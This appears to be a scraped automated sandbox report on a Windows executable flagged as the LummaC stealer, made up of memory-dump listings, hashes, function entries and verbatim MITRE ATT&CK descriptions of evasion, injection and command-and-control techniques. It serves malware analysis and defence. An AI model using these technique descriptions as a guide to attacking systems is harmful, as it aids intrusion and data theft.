Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
Instruction ID: cde9501d63ce90d415eaab30acbf50ce6ddf3fa289f823cb1004d1daffc03592
Opcode Fuzzy Hash: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
Instruction Fuzzy Hash: 6BF0ECB17045185BDF22CA549CC0FB7BB9DCB8B354F190426F84557193D2615885C7E5

Function 00911ACD Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2239577370.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239698326.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239725203.000000000096C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240388453.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240418387.0000000000AC8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240450322.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240478127.0000000000AD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240551621.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240573896.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240596830.0000000000AF7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240620625.0000000000AF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240641561.0000000000AFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240667830.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240691889.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240718615.0000000000B12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240751607.0000000000B16000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240783995.0000000000B17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240827920.0000000000B1F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240867874.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240894258.0000000000B26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240960703.0000000000B3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240984388.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2241182342.0000000000B43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244145175.0000000000B4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244976869.0000000000B54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246229225.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246744356.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246830064.0000000000B59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247059287.0000000000B63000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247307312.0000000000B64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247453390.0000000000B65000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247595084.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247764342.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34459c25c4921bde5e616418d42ae33412e622ab593e1877161d9c6999c1a939
Instruction ID: 42f640280fdff0facddadcdda608ec33786c82e6d6878b394780a06cd2573602
Opcode Fuzzy Hash: 34459c25c4921bde5e616418d42ae33412e622ab593e1877161d9c6999c1a939
Instruction Fuzzy Hash: ACC01238A6C1028B82448F01A8A9836A6B8A70730D700602ADA02E7631DA20C416AA09

Function 00911A3C Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2239577370.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239698326.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239725203.000000000096C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240388453.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240418387.0000000000AC8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240450322.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240478127.0000000000AD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240551621.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240573896.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240596830.0000000000AF7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240620625.0000000000AF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240641561.0000000000AFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240667830.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240691889.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240718615.0000000000B12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240751607.0000000000B16000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240783995.0000000000B17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240827920.0000000000B1F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240867874.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240894258.0000000000B26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240960703.0000000000B3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240984388.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2241182342.0000000000B43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244145175.0000000000B4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244976869.0000000000B54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246229225.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246744356.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246830064.0000000000B59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247059287.0000000000B63000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247307312.0000000000B64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247453390.0000000000B65000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247595084.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247764342.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25bee9631f932fb2f6dde327491061821796384b9471da9868e26de7c0a96a94
Instruction ID: 4a77cd5b09410ea5ac9b72890baa13245ebc4e1a11047283eeb5da8a0ac48991
Opcode Fuzzy Hash: 25bee9631f932fb2f6dde327491061821796384b9471da9868e26de7c0a96a94
Instruction Fuzzy Hash: C9C04C28B6D0468A92448E85A8A5872A6A85707308710343A9702E7671D960D4159609

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_9cfab2bc-8e6f-4031-aac4-8891c7a30c58\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_86d780998731d44cc37040f9271b2fbde5bee817_852b229c_5ebf9abd-6ea0-4dee-b7fe-65fc2553a077\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER160F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16DB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16FB.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC42.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD7B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDAB.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
file.exe

Function 0090FCA0 Relevance: 6.6, Strings: 5, Instructions: 373
COMMON

Function 00945700 Relevance: 1.6, APIs: 1, Instructions: 69
memoryCOMMON

Function 0091049B Relevance: .3, Instructions: 264
COMMON

Function 00910228 Relevance: .2, Instructions: 218
COMMON

Function 0090D110 Relevance: .2, Instructions: 168
COMMON

Function 00943220 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Function 00945BB0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 00912F6F Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Function 00912F10 Relevance: 1.3, APIs: 1, Instructions: 33
COMMON